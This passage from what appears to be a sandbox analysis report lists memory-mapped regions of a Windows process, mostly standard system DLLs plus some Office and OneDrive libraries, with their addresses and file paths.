= 3873 start_va = 0x7ffae1520000 end_va = 0x7ffae156ffff entry_point = 0x7ffae1520000 region_type = mapped_file name = "actioncenter.dll" filename = "\\Windows\\System32\\ActionCenter.dll" (normalized: "c:\\windows\\system32\\actioncenter.dll") Region: id = 3874 start_va = 0x7ffae1570000 end_va = 0x7ffae157ffff entry_point = 0x7ffae1570000 region_type = mapped_file name = "atlthunk.dll" filename = "\\Windows\\System32\\atlthunk.dll" (normalized: "c:\\windows\\system32\\atlthunk.dll") Region: id = 3875 start_va = 0x7ffae1580000 end_va = 0x7ffae1596fff entry_point = 0x7ffae1580000 region_type = mapped_file name = "syncreg.dll" filename = "\\Windows\\System32\\Syncreg.dll" (normalized: "c:\\windows\\system32\\syncreg.dll") Region: id = 3876 start_va = 0x7ffae15a0000 end_va = 0x7ffae15e0fff entry_point = 0x7ffae15a0000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 3877 start_va = 0x7ffae15f0000 end_va = 0x7ffae1798fff entry_point = 0x7ffae15f0000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10240.16384_none_89a94c179af51f83\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10240.16384_none_89a94c179af51f83\\gdiplus.dll") Region: id = 3878 start_va = 0x7ffae17a0000 end_va = 0x7ffae1818fff entry_point = 0x7ffae17a0000 region_type = mapped_file name = "dxp.dll" filename = "\\Windows\\System32\\DXP.dll" (normalized: "c:\\windows\\system32\\dxp.dll") Region: id = 3879 start_va = 0x7ffae1820000 end_va = 0x7ffae18a3fff entry_point = 0x7ffae1820000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 3880 start_va = 0x7ffae18b0000 end_va = 0x7ffae192bfff entry_point = 0x7ffae18b0000 region_type = mapped_file name = "prnfldr.dll" filename = "\\Windows\\System32\\prnfldr.dll" (normalized: "c:\\windows\\system32\\prnfldr.dll") Region: id = 3881 start_va = 0x7ffae1930000 end_va = 0x7ffae1a6afff entry_point = 0x7ffae1930000 region_type = mapped_file name = "windows.ui.shell.dll" filename = "\\Windows\\System32\\Windows.UI.Shell.dll" (normalized: "c:\\windows\\system32\\windows.ui.shell.dll") Region: id = 3882 start_va = 0x7ffae1a70000 end_va = 0x7ffae1a7bfff entry_point = 0x7ffae1a70000 region_type = mapped_file name = "notificationcontrollerps.dll" filename = "\\Windows\\System32\\NotificationControllerPS.dll" (normalized: "c:\\windows\\system32\\notificationcontrollerps.dll") Region: id = 3883 start_va = 0x7ffae1a80000 end_va = 0x7ffae1c7dfff entry_point = 0x7ffae1a80000 region_type = mapped_file name = "batmeter.dll" filename = "\\Windows\\System32\\batmeter.dll" (normalized: "c:\\windows\\system32\\batmeter.dll") Region: id = 3884 start_va = 0x7ffae1c80000 end_va = 0x7ffae1cdbfff entry_point = 0x7ffae1c80000 region_type = mapped_file name = "stobject.dll" filename = "\\Windows\\System32\\stobject.dll" (normalized: "c:\\windows\\system32\\stobject.dll") Region: id = 3885 start_va = 0x7ffae1d40000 end_va = 0x7ffae1d7cfff entry_point = 0x7ffae1d40000 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 3886 start_va = 0x7ffae4200000 end_va = 0x7ffae421afff entry_point = 0x7ffae4200000 region_type = mapped_file name = "wercplsupport.dll" filename = "\\Windows\\System32\\wercplsupport.dll" (normalized: "c:\\windows\\system32\\wercplsupport.dll") Region: id = 3887 start_va = 0x7ffae4220000 end_va = 0x7ffae424dfff entry_point = 0x7ffae4220000 region_type = mapped_file name = "wscinterop.dll" filename = "\\Windows\\System32\\wscinterop.dll" (normalized: "c:\\windows\\system32\\wscinterop.dll") Region: id = 3888 start_va = 0x7ffae4e00000 end_va = 0x7ffae4e4dfff entry_point = 0x7ffae4e00000 region_type = mapped_file name = "notificationobjfactory.dll" filename = "\\Windows\\System32\\NotificationObjFactory.dll" (normalized: "c:\\windows\\system32\\notificationobjfactory.dll") Region: id = 3889 start_va = 0x7ffae58e0000 end_va = 0x7ffae590bfff entry_point = 0x7ffae58e0000 region_type = mapped_file name = "winmmbase.dll" filename = "\\Windows\\System32\\winmmbase.dll" (normalized: "c:\\windows\\system32\\winmmbase.dll") Region: id = 3890 start_va = 0x7ffae5910000 end_va = 0x7ffae5932fff entry_point = 0x7ffae5910000 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 3891 start_va = 0x7ffae5a50000 end_va = 0x7ffae5ceffff entry_point = 0x7ffae5a50000 region_type = mapped_file name = "gameux.dll" filename = "\\Windows\\System32\\gameux.dll" (normalized: "c:\\windows\\system32\\gameux.dll") Region: id = 3892 start_va = 0x7ffae5d00000 end_va = 0x7ffae5d98fff entry_point = 0x7ffae5d00000 region_type = mapped_file name = "staterepository.core.dll" filename = "\\Windows\\System32\\StateRepository.Core.dll" (normalized: "c:\\windows\\system32\\staterepository.core.dll") Region: id = 3893 start_va = 0x7ffae5da0000 end_va = 0x7ffae6031fff entry_point = 0x7ffae5da0000 region_type = mapped_file name = "windows.staterepository.dll" filename = "\\Windows\\System32\\Windows.StateRepository.dll" (normalized: "c:\\windows\\system32\\windows.staterepository.dll") Region: id = 3894 start_va = 0x7ffae6040000 end_va = 0x7ffae6099fff entry_point = 0x7ffae6040000 region_type = mapped_file name = "dsreg.dll" filename = "\\Windows\\System32\\dsreg.dll" (normalized: "c:\\windows\\system32\\dsreg.dll") Region: id = 3895 start_va = 0x7ffae60a0000 end_va = 0x7ffae60b1fff entry_point = 0x7ffae60a0000 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Region: id = 3896 start_va = 0x7ffae6120000 end_va = 0x7ffae61b8fff entry_point = 0x7ffae6120000 region_type = mapped_file name = "wlidprov.dll" filename = "\\Windows\\System32\\wlidprov.dll" (normalized: "c:\\windows\\system32\\wlidprov.dll") Region: id = 3897 start_va = 0x7ffae61c0000 end_va = 0x7ffae61eafff entry_point = 0x7ffae61c0000 region_type = mapped_file name = "abovelockapphost.dll" filename = "\\Windows\\System32\\AboveLockAppHost.dll" (normalized: "c:\\windows\\system32\\abovelockapphost.dll") Region: id = 3898 start_va = 0x7ffae61f0000 end_va = 0x7ffae620ffff entry_point = 0x7ffae61f0000 region_type = mapped_file name = "wcmapi.dll" filename = "\\Windows\\System32\\wcmapi.dll" (normalized: "c:\\windows\\system32\\wcmapi.dll") Region: id = 3899 start_va = 0x7ffae6260000 end_va = 0x7ffae6275fff entry_point = 0x7ffae6260000 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 3900 start_va = 0x7ffae6280000 end_va = 0x7ffae632bfff entry_point = 0x7ffae6280000 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 3901 start_va = 0x7ffae6500000 end_va = 0x7ffae6548fff entry_point = 0x7ffae6500000 region_type = mapped_file name = "veeventdispatcher.dll" filename = "\\Windows\\System32\\VEEventDispatcher.dll" (normalized: "c:\\windows\\system32\\veeventdispatcher.dll") Region: id = 3902 start_va = 0x7ffae6550000 end_va = 0x7ffae65d2fff entry_point = 0x7ffae6550000 region_type = mapped_file name = "notificationcontroller.dll" filename = "\\Windows\\System32\\NotificationController.dll" (normalized: "c:\\windows\\system32\\notificationcontroller.dll") Region: id = 3903 start_va = 0x7ffae65e0000 end_va = 0x7ffae66b3fff entry_point = 0x7ffae65e0000 region_type = mapped_file name = "wpncore.dll" filename = "\\Windows\\System32\\wpncore.dll" (normalized: "c:\\windows\\system32\\wpncore.dll") Region: id = 3904 start_va = 0x7ffae66c0000 end_va = 0x7ffae66f6fff entry_point = 0x7ffae66c0000 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 3905 start_va = 0x7ffae6700000 end_va = 0x7ffae679efff entry_point = 0x7ffae6700000 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\msvcp140.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msvcp140.dll") Region: id = 3906 start_va = 0x7ffae67a0000 end_va = 0x7ffae67b5fff entry_point = 0x7ffae67a0000 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\vcruntime140.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\vcruntime140.dll") Region: id = 3907 start_va = 0x7ffae67c0000 end_va = 0x7ffae6ad2fff entry_point = 0x7ffae67c0000 region_type = mapped_file name = "grooveex.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\grooveex.dll") Region: id = 3908 start_va = 0x7ffae6ae0000 end_va = 0x7ffae6d9dfff entry_point = 0x7ffae6ae0000 region_type = mapped_file name = "filesyncshell64.dll" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\amd64\\FileSyncShell64.dll" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\amd64\\filesyncshell64.dll") Region: id = 3909 start_va = 0x7ffae6da0000 end_va = 0x7ffae6db7fff entry_point = 0x7ffae6da0000 region_type = mapped_file name = "elscore.dll" filename = "\\Windows\\System32\\ELSCore.dll" (normalized: "c:\\windows\\system32\\elscore.dll") Region: id = 3910 start_va = 0x7ffae6dc0000 end_va = 0x7ffae6edafff entry_point = 0x7ffae6dc0000 region_type = mapped_file name = "applicationframe.dll" filename = "\\Windows\\System32\\ApplicationFrame.dll" (normalized: "c:\\windows\\system32\\applicationframe.dll") Region: id = 3911 start_va = 0x7ffae6ee0000 end_va = 0x7ffae6eecfff entry_point = 0x7ffae6ee0000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 3912 start_va = 0x7ffae6ef0000 end_va = 0x7ffae6f3afff entry_point = 0x7ffae6ef0000 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 3913 start_va = 0x7ffae6f40000 end_va = 0x7ffae7019fff entry_point = 0x7ffae6f40000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 3914 start_va = 0x7ffae7020000 end_va = 0x7ffae702ffff entry_point = 0x7ffae7020000 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 3915 start_va = 0x7ffae7030000 end_va = 0x7ffae707cfff entry_point = 0x7ffae7030000 region_type = mapped_file name = "windows.immersiveshell.serviceprovider.dll" filename = "\\Windows\\System32\\windows.immersiveshell.serviceprovider.dll" (normalized: "c:\\windows\\system32\\windows.immersiveshell.serviceprovider.dll") Region: id = 3916 start_va = 0x7ffae7080000 end_va = 0x7ffae7b8cfff entry_point = 0x7ffae7080000 region_type = mapped_file name = "twinui.dll" filename = "\\Windows\\System32\\twinui.dll" (normalized: "c:\\windows\\system32\\twinui.dll") Region: id = 3917 start_va = 0x7ffae7b90000 end_va = 0x7ffae801ffff entry_point = 0x7ffae7b90000 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 3918 start_va = 0x7ffae8020000 end_va = 0x7ffae8065fff entry_point = 0x7ffae8020000 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\System32\\DataExchange.dll" (normalized: "c:\\windows\\system32\\dataexchange.dll") Region: id = 3919 start_va = 0x7ffae8070000 end_va = 0x7ffae80d8fff entry_point = 0x7ffae8070000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 3920 start_va = 0x7ffae80e0000 end_va = 0x7ffae8144fff entry_point = 0x7ffae80e0000 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 3921 start_va = 0x7ffae8150000 end_va = 0x7ffae8160fff entry_point = 0x7ffae8150000 region_type = mapped_file name = "settingsyncpolicy.dll" filename = "\\Windows\\System32\\SettingSyncPolicy.dll" (normalized: "c:\\windows\\system32\\settingsyncpolicy.dll") Region: id = 3922 start_va = 0x7ffae8170000 end_va = 0x7ffae8185fff entry_point = 0x7ffae8170000 region_type = mapped_file name = "capauthz.dll" filename = "\\Windows\\System32\\capauthz.dll" (normalized: "c:\\windows\\system32\\capauthz.dll") Region: id = 3923 start_va = 0x7ffae8190000 end_va = 0x7ffae81a4fff entry_point = 0x7ffae8190000 region_type = mapped_file name = "profext.dll" filename = "\\Windows\\System32\\profext.dll" (normalized: "c:\\windows\\system32\\profext.dll") Region: id = 3924 start_va = 0x7ffae81b0000 end_va = 0x7ffae81f7fff entry_point = 0x7ffae81b0000 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\System32\\vaultcli.dll" (normalized: "c:\\windows\\system32\\vaultcli.dll") Region: id = 3925 start_va = 0x7ffae8210000 end_va = 0x7ffae841cfff entry_point = 0x7ffae8210000 region_type = mapped_file name = "twinui.appcore.dll" filename = "\\Windows\\System32\\twinui.appcore.dll" (normalized: "c:\\windows\\system32\\twinui.appcore.dll") Region: id = 3926 start_va = 0x7ffae8420000 end_va = 0x7ffae84d9fff entry_point = 0x7ffae8420000 region_type = mapped_file name = "twinapi.dll" filename = "\\Windows\\System32\\twinapi.dll" (normalized: "c:\\windows\\system32\\twinapi.dll") Region: id = 3927 start_va = 0x7ffae84f0000 end_va = 0x7ffae8504fff entry_point = 0x7ffae84f0000 region_type = mapped_file name = "execmodelproxy.dll" filename = "\\Windows\\System32\\execmodelproxy.dll" (normalized: "c:\\windows\\system32\\execmodelproxy.dll") Region: id = 3928 start_va = 0x7ffae8760000 end_va = 0x7ffae8825fff entry_point = 0x7ffae8760000 region_type = mapped_file name = "tokenbroker.dll" filename = "\\Windows\\System32\\TokenBroker.dll" (normalized: "c:\\windows\\system32\\tokenbroker.dll") Region: id = 3929 start_va = 0x7ffae8830000 end_va = 0x7ffae8910fff entry_point = 0x7ffae8830000 region_type = mapped_file name = "settingsynccore.dll" filename = "\\Windows\\System32\\SettingSyncCore.dll" (normalized: "c:\\windows\\system32\\settingsynccore.dll") Region: id = 3930 start_va = 0x7ffae89e0000 end_va = 0x7ffae89e8fff entry_point = 0x7ffae89e0000 region_type = mapped_file name = "wpportinglibrary.dll" filename = "\\Windows\\System32\\WpPortingLibrary.dll" (normalized: "c:\\windows\\system32\\wpportinglibrary.dll") Region: id = 3931 start_va = 0x7ffae8ad0000 end_va = 0x7ffae8adbfff entry_point = 0x7ffae8ad0000 region_type = mapped_file name = "dsclient.dll" filename = "\\Windows\\System32\\dsclient.dll" (normalized: "c:\\windows\\system32\\dsclient.dll") Region: id = 3932 start_va = 0x7ffae8b60000 end_va = 0x7ffae8fc9fff entry_point = 0x7ffae8b60000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 3933 start_va = 0x7ffae8fd0000 end_va = 0x7ffae9230fff entry_point = 0x7ffae8fd0000 region_type = mapped_file name = "coreuicomponents.dll" filename = "\\Windows\\System32\\CoreUIComponents.dll" (normalized: "c:\\windows\\system32\\coreuicomponents.dll") Region: id = 3934 start_va = 0x7ffaea0a0000 end_va = 0x7ffaea11ffff entry_point = 0x7ffaea0a0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 3935 start_va = 0x7ffaea9d0000 end_va = 0x7ffaea9e1fff entry_point = 0x7ffaea9d0000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 3936 start_va = 0x7ffaeafb0000 end_va = 0x7ffaeafcdfff entry_point = 0x7ffaeafb0000 region_type = mapped_file name = "bluetoothapis.dll" filename = "\\Windows\\System32\\BluetoothApis.dll" (normalized: "c:\\windows\\system32\\bluetoothapis.dll") Region: id = 3937 start_va = 0x7ffaeb520000 end_va = 0x7ffaeb52dfff entry_point = 0x7ffaeb520000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 3938 start_va = 0x7ffaeb690000 end_va = 0x7ffaeb6eefff entry_point = 0x7ffaeb690000 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 3939 start_va = 0x7ffaeb6f0000 end_va = 0x7ffaeb6f9fff entry_point = 0x7ffaeb6f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 3940 start_va = 0x7ffaeb700000 end_va = 0x7ffaeb9a6fff entry_point = 0x7ffaeb700000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 3941 start_va = 0x7ffaeb9b0000 end_va = 0x7ffaebb46fff entry_point = 0x7ffaeb9b0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 3942 start_va = 0x7ffaebb50000 end_va = 0x7ffaebb5bfff entry_point = 0x7ffaebb50000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 3943 start_va = 0x7ffaebca0000 end_va = 0x7ffaebce0fff entry_point = 0x7ffaebca0000 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 3944 start_va = 0x7ffaebd70000 end_va = 0x7ffaec0acfff entry_point = 0x7ffaebd70000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 3945 start_va = 0x7ffaec140000 end_va = 0x7ffaec17efff entry_point = 0x7ffaec140000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 3946 start_va = 0x7ffaec410000 end_va = 0x7ffaec419fff entry_point = 0x7ffaec410000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 3947 start_va = 0x7ffaecb40000 end_va = 0x7ffaecb60fff entry_point = 0x7ffaecb40000 region_type = mapped_file name = "networkstatus.dll" filename = "\\Windows\\System32\\NetworkStatus.dll" (normalized: "c:\\windows\\system32\\networkstatus.dll") Region: id = 3948 start_va = 0x7ffaecb70000 end_va = 0x7ffaecbdafff entry_point = 0x7ffaecb70000 region_type = mapped_file name = "photometadatahandler.dll" filename = "\\Windows\\System32\\PhotoMetadataHandler.dll" (normalized: "c:\\windows\\system32\\photometadatahandler.dll") Region: id = 3949 start_va = 0x7ffaecbe0000 end_va = 0x7ffaecc2efff entry_point = 0x7ffaecbe0000 region_type = mapped_file name = "inputswitch.dll" filename = "\\Windows\\System32\\InputSwitch.dll" (normalized: "c:\\windows\\system32\\inputswitch.dll") Region: id = 3950 start_va = 0x7ffaecc30000 end_va = 0x7ffaecea3fff entry_point = 0x7ffaecc30000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 3951 start_va = 0x7ffaecf40000 end_va = 0x7ffaecf66fff entry_point = 0x7ffaecf40000 region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Region: id = 3952 start_va = 0x7ffaecfe0000 end_va = 0x7ffaed026fff entry_point = 0x7ffaecfe0000 region_type = mapped_file name = "windows.system.launcher.dll" filename = "\\Windows\\System32\\Windows.System.Launcher.dll" (normalized: "c:\\windows\\system32\\windows.system.launcher.dll") Region: id = 3953 start_va = 0x7ffaed130000 end_va = 0x7ffaed13efff entry_point = 0x7ffaed130000 region_type = mapped_file name = "pcacli.dll" filename = "\\Windows\\System32\\pcacli.dll" (normalized: "c:\\windows\\system32\\pcacli.dll") Region: id = 3954 start_va = 0x7ffaed260000 end_va = 0x7ffaed29ffff entry_point = 0x7ffaed260000 region_type = mapped_file name = "windows.gaming.input.dll" filename = "\\Windows\\System32\\Windows.Gaming.Input.dll" (normalized: "c:\\windows\\system32\\windows.gaming.input.dll") Region: id = 3955 start_va = 0x7ffaed330000 end_va = 0x7ffaed338fff entry_point = 0x7ffaed330000 region_type = mapped_file name = "iconcodecservice.dll" filename = "\\Windows\\System32\\IconCodecService.dll" (normalized: "c:\\windows\\system32\\iconcodecservice.dll") Region: id = 3956 start_va = 0x7ffaed3a0000 end_va = 0x7ffaed415fff entry_point = 0x7ffaed3a0000 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 3957 start_va = 0x7ffaed420000 end_va = 0x7ffaed4b8fff entry_point = 0x7ffaed420000 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 3958 start_va = 0x7ffaed4c0000 end_va = 0x7ffaed55ffff entry_point = 0x7ffaed4c0000 region_type = mapped_file name = "hgcpl.dll" filename = "\\Windows\\System32\\hgcpl.dll" (normalized: "c:\\windows\\system32\\hgcpl.dll") Region: id = 3959 start_va = 0x7ffaed950000 end_va = 0x7ffaedb06fff entry_point = 0x7ffaed950000 region_type = mapped_file name = "windows.ui.immersive.dll" filename = "\\Windows\\System32\\Windows.UI.Immersive.dll" (normalized: "c:\\windows\\system32\\windows.ui.immersive.dll") Region: id = 3960 start_va = 0x7ffaedb10000 end_va = 0x7ffaede85fff entry_point = 0x7ffaedb10000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 3961 start_va = 0x7ffaeee90000 end_va = 0x7ffaeef2dfff entry_point = 0x7ffaeee90000 region_type = mapped_file name = "windows.ui.dll" filename = "\\Windows\\System32\\Windows.UI.dll" (normalized: "c:\\windows\\system32\\windows.ui.dll") Region: id = 3962 start_va = 0x7ffaeef30000 end_va = 0x7ffaef03efff entry_point = 0x7ffaeef30000 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 3963 start_va = 0x7ffaef040000 end_va = 0x7ffaef0a9fff entry_point = 0x7ffaef040000 region_type = mapped_file name = "wincorlib.dll" filename = "\\Windows\\System32\\wincorlib.dll" (normalized: "c:\\windows\\system32\\wincorlib.dll") Region: id = 3964 start_va = 0x7ffaef0f0000 end_va = 0x7ffaef0f9fff entry_point = 0x7ffaef0f0000 region_type = mapped_file name = "msiltcfg.dll" filename = "\\Windows\\System32\\msiltcfg.dll" (normalized: "c:\\windows\\system32\\msiltcfg.dll") Region: id = 3965 start_va = 0x7ffaef100000 end_va = 0x7ffaef182fff entry_point = 0x7ffaef100000 region_type = mapped_file name = "imapi2.dll" filename = "\\Windows\\System32\\imapi2.dll" (normalized: "c:\\windows\\system32\\imapi2.dll") Region: id = 3966 start_va = 0x7ffaef190000 end_va = 0x7ffaef1ecfff entry_point = 0x7ffaef190000 region_type = mapped_file name = "srchadmin.dll" filename = "\\Windows\\System32\\srchadmin.dll" (normalized: "c:\\windows\\system32\\srchadmin.dll") Region: id = 3967 start_va = 0x7ffaef1f0000 end_va = 0x7ffaef23ffff entry_point = 0x7ffaef1f0000 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 3968 start_va = 0x7ffaef240000 end_va = 0x7ffaef24cfff entry_point = 0x7ffaef240000 region_type = mapped_file name = "cscdll.dll" filename = "\\Windows\\System32\\cscdll.dll" (normalized: "c:\\windows\\system32\\cscdll.dll") Region: id = 3969 start_va = 0x7ffaef250000 end_va = 0x7ffaef313fff entry_point = 0x7ffaef250000 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 3970 start_va = 0x7ffaef320000 end_va = 0x7ffaef35efff entry_point = 0x7ffaef320000 region_type = mapped_file name = "settingmonitor.dll" filename = "\\Windows\\System32\\SettingMonitor.dll" (normalized: "c:\\windows\\system32\\settingmonitor.dll") Region: id = 3971 start_va = 0x7ffaef360000 end_va = 0x7ffaef391fff entry_point = 0x7ffaef360000 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 3972 start_va = 0x7ffaef620000 end_va = 0x7ffaef6f5fff entry_point = 0x7ffaef620000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 3973 start_va = 0x7ffaef7b0000 end_va = 0x7ffaef841fff entry_point = 0x7ffaef7b0000 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 3974 start_va = 0x7ffaef850000 end_va = 0x7ffaef888fff entry_point = 0x7ffaef850000 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 3975 start_va = 0x7ffaef9c0000 end_va = 0x7ffaef9f5fff entry_point = 0x7ffaef9c0000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 3976 start_va = 0x7ffaefad0000 end_va = 0x7ffaefafffff entry_point = 0x7ffaefad0000 region_type = mapped_file name = "rtworkq.dll" filename = "\\Windows\\System32\\RTWorkQ.dll" (normalized: "c:\\windows\\system32\\rtworkq.dll") Region: id = 3977 start_va = 0x7ffaefb00000 end_va = 0x7ffaefc0bfff entry_point = 0x7ffaefb00000 region_type = mapped_file name = "mfplat.dll" filename = "\\Windows\\System32\\mfplat.dll" (normalized: "c:\\windows\\system32\\mfplat.dll") Region: id = 3978 start_va = 0x7ffaefc20000 end_va = 0x7ffaefcc6fff entry_point = 0x7ffaefc20000 region_type = mapped_file name = "ieproxy.dll" filename = "\\Windows\\System32\\ieproxy.dll" (normalized: "c:\\windows\\system32\\ieproxy.dll") Region: id = 3979 start_va = 0x7ffaefcd0000 end_va = 0x7ffaf0214fff entry_point = 0x7ffaefcd0000 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 3980 start_va = 0x7ffaf02c0000 end_va = 0x7ffaf03b1fff entry_point = 0x7ffaf02c0000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 3981 start_va = 0x7ffaf07f0000 end_va = 0x7ffaf0809fff entry_point = 0x7ffaf07f0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 3982 start_va = 0x7ffaf0810000 end_va = 0x7ffaf0825fff entry_point = 0x7ffaf0810000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 3983 start_va = 0x7ffaf0a90000 end_va = 0x7ffaf0aabfff entry_point = 0x7ffaf0a90000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 3984 start_va = 0x7ffaf0ac0000 end_va = 0x7ffaf0acafff entry_point = 0x7ffaf0ac0000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 3985 start_va = 